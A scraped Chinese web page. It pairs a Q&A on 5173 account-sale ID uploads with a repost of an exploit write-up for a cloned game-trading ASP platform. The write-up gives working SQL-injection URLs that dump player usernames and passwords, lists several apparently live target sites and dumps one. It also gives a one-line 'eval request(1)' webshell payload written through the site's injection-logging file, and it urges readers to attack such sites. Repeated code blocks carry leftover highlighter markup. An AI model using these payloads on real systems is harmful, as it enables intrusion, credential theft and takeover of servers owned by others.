您还未登陆,请登录后操作!
5173虚拟交易身份证问题
我想问一下我要卖号,想上传身份证,请问身份证上传有什么要求么?图片大小,还有是有要上传身份证背面。希望您能给我一个完整的答复。
尊敬的客户:
您好!5173回复客服01很高兴为您服务!
帐号身份证上传规则如下:
①上传图片的格式为JPG,否则不允许上传;(格式转换方法:将您的图片打开后选择“另存为”,保存时请选择JPG格式);
②上传图片大小应小于512KB,否则不能成功上传;
③第二代身份证请上传正反两面;
④身份证图片需要能够完整清楚的显示身份信息,不能随意涂改或上传与身份证无关的图片;
⑤为保障买家购买帐号的安全性,交易成功以后身份证图片会转交给买家。
回答数:98189
游戏装备交易现在最保险的手段的5173交易,
5173的工作原理就是,
5173先作为中介代收交易双方的装备和钱,
确认交易就把卖家的装备给买装备的人,
而把钱给卖装备的人,而5173收取部分手续费.
(5173的手续费用比淘宝要高,淘宝是自动的,5173是人工的!)
淘宝是中国最大的网上交易平台,5173只是游戏装备(虚拟物品的交易平台)
但是淘宝交易时候一定包保留好交易证据,不然交易虚拟物品有一定的风险.
比如,别人说卖东西,但是只是去游戏象征的交易你而没有交易成功时候,
别人截图可以当证据,这时候纠纷就需要淘宝客服来仲裁,
这过程很慢!
所以,交易游戏物品时候最好选择5173,多点手续费还是要安全点!
要想了解更多,请照参考资料.
您的举报已经提交成功,我们将尽快处理,谢谢!通用型仿5173游戏交易平台系统SQL注入(可直接脱裤)+Getshell - ASP - 漏洞时代
16 次浏览 |
文章目录漏洞作者:
最近没事登登好几年前玩过的游戏看看,发现有人喊高价收号,这一看就是骗子,这等骗子还想骗我?我就来看看这逗逼是怎么骗人的,结果发现这人给了一个说是5173平台交易的网站,叫我直接把号的信息填上去然后填好了之后就去他就会去购买,然后仔细看了一下平台,获取了源代码后看了一下~呵呵,漏洞还是有不少的~ 仿5173网游交易平台游戏交易平台存在注入与getshell漏洞,可直接拖掉玩家数据~
发乌云上乌云不收,所以没事就发zone里给大家玩玩。其实这系统还是蛮多漏洞的,我最痛恨骗子了,大家能搞几个骗子平台就搞几个去吧~案例上大多都是一些骗子搭建来钓鱼的。
A:SQL注入一:
漏洞文件:/help.asp
&!--#include file="conn.asp"--&
&!--#include file="inc/config.asp"--&
if trim(request("id")) && "" then
set rs=conn.execute("select * from help where id ="&trim(request("id"))&" order by paixu asc")
if not rs.eof then
title=rs("help_title")
content=rs("help_content")
set rs=conn.execute("select top 1 * from help order by paixu asc")
if not rs.eof then
title=rs("help_title")
content=rs("help_content")
<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d
<!--#include file="conn.asp"--&<!--#include file="inc/config.asp"--&&<%if trim(request("id")) <> "" thenset rs=conn.execute("select * from help where id ="&trim(request("id"))&" order by paixu asc")if not rs.eof thentitle=rs("help_title")content=rs("help_content")end ifelseset rs=conn.execute("select top 1 * from help order by paixu asc")if not rs.eof thentitle=rs("help_title")content=rs("help_content")end ifend if%>
这里id参数过滤不严存在sql注入的,但是conn.asp中包含了:
&!--#include file="sqlin.asp"--&
<div class="crayon-num" data-line="crayon-54b94d
<!--#include file="sqlin.asp"--&
都知道这个防注入文件很垃圾吧,只做了GET和POST的防注入,可直接转为cookie注入绕过
这个注入我就不多研究了,看下一个支持UNION query的注入点。
B:SQL注入二
漏洞文件:/card_server.asp
function OpenDB(sdbname)
*--------------- OpenDB(sdbname) -----------------
* OpenDB(sdbname)
* 功能:打开数据库sdbname,返回conn对象.
* 参数:sdbname,字符串,数据库名称.
* 实例:var conn = OpenDB("database.mdb");
*--------------- OpenDB(sdbname) -----------------
/*var connstr = "driver={SQL Server};server=.;uid=pwd=7881541;database=wangyou";*/
var connstr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source="+Server.MapPath(sdbname);
var conn = Server.CreateObject("ADODB.Connection");
conn.Open(connstr);
var oConn = OpenDB("HSGAMEDB/#HSgame.asp");
var sel = Request("sel");
var classid = Request("classid")
var fieldname = Request("fieldname")
var arrResult = new Array();
//var sql = "select "+fieldname+" from game_class where parentid='"+sel+"' and classid="+
var sql = "select * from card_class where parentid="+sel+"";
//Response.Write("alert("+sql+")")
var rs0 = Server.CreateObject("ADODB.Recordset");
rs0.Open(sql,oConn,1,1);
while(!rs0.EOF)
//遍历所有适合的数据放入arrResult数组中.
arrResult[arrResult.length] = rs0(0).Value+"|"+rs0(1).V
rs0.MoveNext();
//escape解决了XMLHTTP。中文处理的问题.
//数组组合成字符串.由","字符串连接.
Response.Write(escape(arrResult.join(",")));
<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d
<%function OpenDB(sdbname){/**--------------- OpenDB(sdbname) -----------------* OpenDB(sdbname)* 功能:打开数据库sdbname,返回conn对象.* 参数:sdbname,字符串,数据库名称.* 实例:var conn = OpenDB("database.mdb");*--------------- OpenDB(sdbname) -----------------*//*var connstr = "driver={SQL Server};server=.;uid=pwd=7881541;database=wangyou";*/var connstr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source="+Server.MapPath(sdbname);var conn = Server.CreateObject("ADODB.Connection");conn.Open(connstr);return conn;}var oConn = OpenDB("HSGAMEDB/#HSgame.asp");var sel = Request("sel");var classid = Request("classid")var fieldname = Request("fieldname")var arrResult = new Array();//var sql = "select "+fieldname+" from game_class where parentid='"+sel+"' and classid="+var sql = "select * from card_class where parentid="+sel+"";//Response.Write("alert("+sql+")")var rs0 = Server.CreateObject("ADODB.Recordset");rs0.Open(sql,oConn,1,1);while(!rs0.EOF){//遍历所有适合的数据放入arrResult数组中.arrResult[arrResult.length] = rs0(0).Value+"|"+rs0(1).Value;rs0.MoveNext();}//escape解决了XMLHTTP。中文处理的问题.//数组组合成字符串.由","字符串连接.Response.Write(escape(arrResult.join(",")));%>
这里没有直接包含数据库连接文件,直接创建了连接对象,导致这一个注入是无法被sqlin.asp防御,注意,Request的sel参数没有过滤直接带入查询导致了SQL注入。简单构造一下注入点:
http://127.0.0.1/card_server.asp?sel=1′
Microsoft JET Database Engine 错误 &#e14′
字符串的语法错误 在查询表达式 ‘parentid=1” 中。
/card_server.asp,行 28
支持联合查询,可直脱掉ganme_user的玩家数据,好像sqlmap没有game_user的字典吧?。还有一个字段”alipay_pwd”是用户的支付密码~
http://127.0.0.1/card_server.asp?sel=1%20union%20select%20user_name,login_pwd,3,4,5,6,7,8,9%20from%20game_user
http://127.0.0.1/card_server.asp?sel=1%20union%20select%20user_name,login_pwd,3,4,5,6,7,8,9%20from%20game_user
由于通用型的要5个案例,那我就来五个~
/card_server.asp?sel=1
.cn/card_server.asp?sel=1
/card_server.asp?sel=1
http://gaoyi.cc/card_server.asp?sel=1
/card_server.asp?sel=1
<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d
http:///card_server.asp?sel=1http://.cn/card_server.asp?sel=1http:///card_server.asp?sel=1http://gaoyi.cc/card_server.asp?sel=1http:///card_server.asp?sel=1
我来脱个裤子给大家看看:
.cn/card_server.asp?sel=1%20union%20select%20user_name,login_pwd,3,4,5,6,7,8,9%20from%20game_user
C:GETSHELL:
漏洞文件:/SqlIn.Asp
'--------数据库连接部分--------------
'dim dbkillSql,killSqlconn,connkillSql
dbkillSql="sql_whelpu.asp"
'On Error Resume Next
Set killSqlconn = Server.CreateObject("ADODB.Connection")
connkillSql="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(dbkillSql)
killSqlconn.Open connkillSql
If Err Then
Set killSqlconn = Nothing
Response.Write "数据库连接出错,请检查连接字串。"
Response.End
'--------定义部份------------------
'Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr,Kill_IP,WriteSql
'自定义需要过滤的字串,用 "|" 分隔
Fy_In = "'|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"
Kill_IP=True
WriteSql=True
'----------------------------------
Fy_Inf = split(Fy_In,"|")
'--------POST部份------------------
If Request.Form&&"" Then
For Each Fy_Post In Request.Form
For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh))&&0 Then
If WriteSql=True Then
killSqlconn.Execute("insert into SqlIn(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('"&Request.ServerVariables("REMOTE_ADDR")&"','"&Request.ServerVariables("URL")&"','POST','"&Fy_Post&"','"&replace(Request.Form(Fy_Post),"'","''")&"')")
killSqlconn.close
Set killSqlconn = Nothing
Response.Write "&Script Language=JavaScript&alert('系统提示:108非法操作!');&/Script&"
Response.Write "非法操作!系统做了如下记录↓&br&"
Response.Write "操作IP:"&Request.ServerVariables("REMOTE_ADDR")&"&br&"
Response.Write "操作时间:"&Now&"&br&"
Response.Write "操作页面:"&Request.ServerVariables("URL")&"&br&"
Response.Write "提交方式:POST&br&"
Response.Write "提交参数:"&Fy_Post&"&br&"
Response.Write "提交数据:"&Request.Form(Fy_Post)
Response.Redirect("default.asp")
Response.End
'----------------------------------
'--------GET部份-------------------
If Request.QueryString&&"" Then
For Each Fy_Get In Request.QueryString
For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.QueryString(Fy_Get)),Fy_Inf(Fy_Xh))&&0 Then
If WriteSql=True Then
killSqlconn.Execute("insert into SqlIn(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('"&Request.ServerVariables("REMOTE_ADDR")&"','"&Request.ServerVariables("URL")&"','GET','"&Fy_Get&"','"&replace(Request.QueryString(Fy_Get),"'","''")&"')")
killSqlconn.close
Set killSqlconn = Nothing
Response.Write "&Script Language=JavaScript&alert('系统提示:108非法操作!');&/Script&"
Response.Write "非法操作!系统做了如下记录↓&br&"
Response.Write "操作IP:"&Request.ServerVariables("REMOTE_ADDR")&"&br&"
Response.Write "操作时间:"&Now&"&br&"
Response.Write "操作页面:"&Request.ServerVariables("URL")&"&br&"
Response.Write "提交方式:GET&br&"
Response.Write "提交参数:"&Fy_Get&"&br&"
Response.Write "提交数据:"&Request.QueryString(Fy_Get)
Response.Redirect("default.asp")
Response.End
<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d<div class="crayon-num crayon-striped-num" data-line="crayon-54b94d<div class="crayon-num" data-line="crayon-54b94d
<%'--------数据库连接部分--------------'dim dbkillSql,killSqlconn,connkillSqldbkillSql="sql_whelpu.asp"'On Error Resume NextSet killSqlconn = Server.CreateObject("ADODB.Connection")connkillSql="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(dbkillSql)killSqlconn.Open connkillSqlIf Err Thenerr.ClearSet killSqlconn = NothingResponse.Write "数据库连接出错,请检查连接字串。"Response.EndEnd If'--------定义部份------------------'Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr,Kill_IP,WriteSql'自定义需要过滤的字串,用 "|" 分隔Fy_In = "'|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"Kill_IP=TrueWriteSql=True'----------------------------------Fy_Inf = split(Fy_In,"|")'--------POST部份------------------If Request.Form<>"" ThenFor Each Fy_Post In Request.FormFor Fy_Xh=0 To Ubound(Fy_Inf)If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh))<>0 ThenIf WriteSql=True ThenkillSqlconn.Execute("insert into SqlIn(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('"&Request.ServerVariables("REMOTE_ADDR")&"','"&Request.ServerVariables("URL")&"','POST','"&Fy_Post&"','"&replace(Request.Form(Fy_Post),"'","''")&"')")killSqlconn.closeSet killSqlconn = NothingEnd IfResponse.Write "&Script Language=JavaScript&alert('系统提示:108非法操作!');&/Script&"Response.Write "非法操作!系统做了如下记录↓&br&"Response.Write "操作IP:"&Request.ServerVariables("REMOTE_ADDR")&"&br&"Response.Write "操作时间:"&Now&"&br&"Response.Write "操作页面:"&Request.ServerVariables("URL")&"&br&"Response.Write "提交方式:POST&br&"Response.Write "提交参数:"&Fy_Post&"&br&"Response.Write "提交数据:"&Request.Form(Fy_Post)Response.Redirect("default.asp")Response.EndEnd IfNextNextEnd If'----------------------------------&'--------GET部份-------------------If Request.QueryString<>"" ThenFor Each Fy_Get In Request.QueryStringFor Fy_Xh=0 To Ubound(Fy_Inf)If Instr(LCase(Request.QueryString(Fy_Get)),Fy_Inf(Fy_Xh))<>0 ThenIf WriteSql=True ThenkillSqlconn.Execute("insert into SqlIn(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('"&Request.ServerVariables("REMOTE_ADDR")&"','"&Request.ServerVariables("URL")&"','GET','"&Fy_Get&"','"&replace(Request.QueryString(Fy_Get),"'","''")&"')")killSqlconn.closeSet killSqlconn = NothingEnd IfResponse.Write "&Script Language=JavaScript&alert('系统提示:108非法操作!');&/Script&"Response.Write "非法操作!系统做了如下记录↓&br&"Response.Write "操作IP:"&Request.ServerVariables("REMOTE_ADDR")&"&br&"Response.Write "操作时间:"&Now&"&br&"Response.Write "操作页面:"&Request.ServerVariables("URL")&"&br&"Response.Write "提交方式:GET&br&"Response.Write "提交参数:"&Fy_Get&"&br&"Response.Write "提交数据:"&Request.QueryString(Fy_Get)Response.Redirect("default.asp")Response.EndEnd IfNextNextEnd If%>
这里直接将用户非法提交的字符串写入了sql_whelpu.asp的数据库里面了,试想一下,如果故意加入一句话不就可以GETSHELL了吗? 在没有被人插入过asp的&%%&符号则可直接访问:
http://127.0.0.1/list_buy.asp?class_1=C%eval%20request(1)%%3E
http://127.0.0.1/list_buy.asp?class_1=C%eval%20request(1)%%3E
当然如果有被人提交过的需要注意闭合就可以获取webshell了~ 这里成功将一句话写入数据库:sql_whelpu.asp,我们打开看看是不是呢?
菜刀连接:
http://127.0.0.1/sql_whelpu.asp
大家吃好喝好玩好!大家随便玩,别打脸就是啊!
没有个人说明
184 106 87 86 80
WP Cumulus Flash tag cloud by
--=本 站 公 告=--
本站的文章都大多源自网络.并不是都是原创。如果没有著名出处。可能是转载文章的时候没有写或者是文章本身就是转载的就没在写出处。本站定位就是分享资源。如果有版权问题,请联系本站删除或者更改!!!需要交换链接的朋友请到留言~~
